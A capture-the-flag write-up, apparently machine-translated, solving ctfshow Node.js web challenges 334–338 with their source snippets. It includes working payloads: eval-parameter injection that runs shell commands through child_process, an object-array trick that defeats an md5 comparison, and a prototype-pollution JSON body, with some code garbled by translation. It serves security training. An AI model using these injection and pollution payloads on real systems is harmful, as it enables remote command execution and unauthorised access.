Ctfshow web introduction nodejs part of the problem solution

nodejs

web334

Download the attachment first and click user JS found account password

module.exports = {
  items: [
    {username: 'CTFSHOW', password: '123456'}
  ]
};

It is wrong to directly enter the account and password when opening the environment. The specific reason is in login JS

var findUser = function(name, password){
  return users.find(function(item){
    return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password;
  });
};

It can be seen that after all the uppercase letters in the name we entered are equal to CTFSHOW, and the value of name is not CTFSHOW. After the test, it is found that name=ctfshow, password=123456

web335

Check the source code and find a prompt <! -- /? eval= -->

First pass in a random number and find it echoed out, but when you enter a letter, it will show 404 that the file cannot be found, indicating that the content we entered should be executed here. The code here may be eval('console.log(xxx) '

Then execute the command:

?eval=require( 'child_process' ).execSync( 'ls' )
?eval=require( 'child_process' ).spawnSync( 'ls' ).stdout.toString()

?eval=require( 'child_process' ).execSync( 'cat fl00g.txt' )
?eval=require( 'child_process' ).spawnSync( 'cat', [ 'fl00g.txt' ] ).stdout.toString()

web336

Compared with the previous question, if there is filtering and exec is filtered, use the second posture

?eval=require( 'child_process' ).spawnSync( 'ls' ).stdout.toString()
?eval=require( 'child_process' ).spawnSync( 'cat', [ 'fl001g.txt' ] ).stdout.toString()

web337

This question is given to the source code

var express = require('express');
var router = express.Router();
var crypto = require('crypto');

function md5(s) {
  return crypto.createHash('md5')
    .update(s)
    .digest('hex');
}

/* GET home page. */
router.get('/', function(req, res, next) {
  res.type('html');
  var flag='xxxxxxx';
  var a = req.query.a;
  var b = req.query.b;
  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
  	res.end(flag);
  }else{
  	res.render('index',{ msg: 'tql'});
  }
  
});

module.exports = router;

For simple analysis, you need to pass in a and b. their values are different from each other, but the length is the same, and md5(a+flag)===md5(b+flag)

It's still in the front. The focus is on the last one. Normal means must not work. Then try the array
payload:

Here, you only need to satisfy that there are letters in brackets. It doesn't matter whether their values are different or their lengths are different
?a[a]=2&b[b]=2

As for why the numbers in brackets are not enough, here refer to the explanation given by Master Yu

a={'x':'1'}
b={'x':'2'}

console.log(a+"flag{xxx}")
console.log(b+"flag{xxx}")
The result of both is[object Object]flag{xxx},therefore md5 The values are the same

But if pass a[0]=1&b[0]=2,It's equivalent to creating a variable a=[1] b=[2],When printing as above, 1 will be printed flag{xxx}And 2 flag{xxx}

web338

This question examines the prototype chain pollution. I'm looking at Master Yu Recommended blogs

The title is given to the source code, but the file seems to be out of date. There's no way. I can only look at the key code circled by other big guys

router.post('/', require('body-parser').json(),function(req, res, next) {
  res.type('html');
  var flag='flag_here';
  var secert = {};
  var sess = req.session;
  let user = {};
  utils.copy(user,req.body);
  if(secert.ctfshow==='36dboy'){
    res.end(flag);
  }else{
    return res.json({ret_code: 2, ret_msg: 'Login failed'+JSON.stringify(user)});  
  }
});

You need to meet the secert Ctfshow = = = '36dboy', the utilization point is utils copy(user,req.body);, The copy here is similar to the merge in the blog above. Follow the steps inside

Capturing packets, changing parameters {"username": "123", "password": "123", "proto": {"ctfshow":"36dboy"}}

Prototype is the attribute of a class. All class objects will have the attributes and methods in prototype when instantiated
Of an object__ proto__ Property, pointing to the prototype property of the class where the object is located

After contamination, the secret object inherits object Prototype, or secert Ctfshow = = = '36dboy', meeting the conditions of the topic

I can't see the source code of the following questions, so I won't do it for the time being.

Reference blog

https://blog.csdn.net/miuzzx/article/details/111780832

Keywords: CTF

Added by JC99 on Fri, 11 Feb 2022 23:05:47 +0200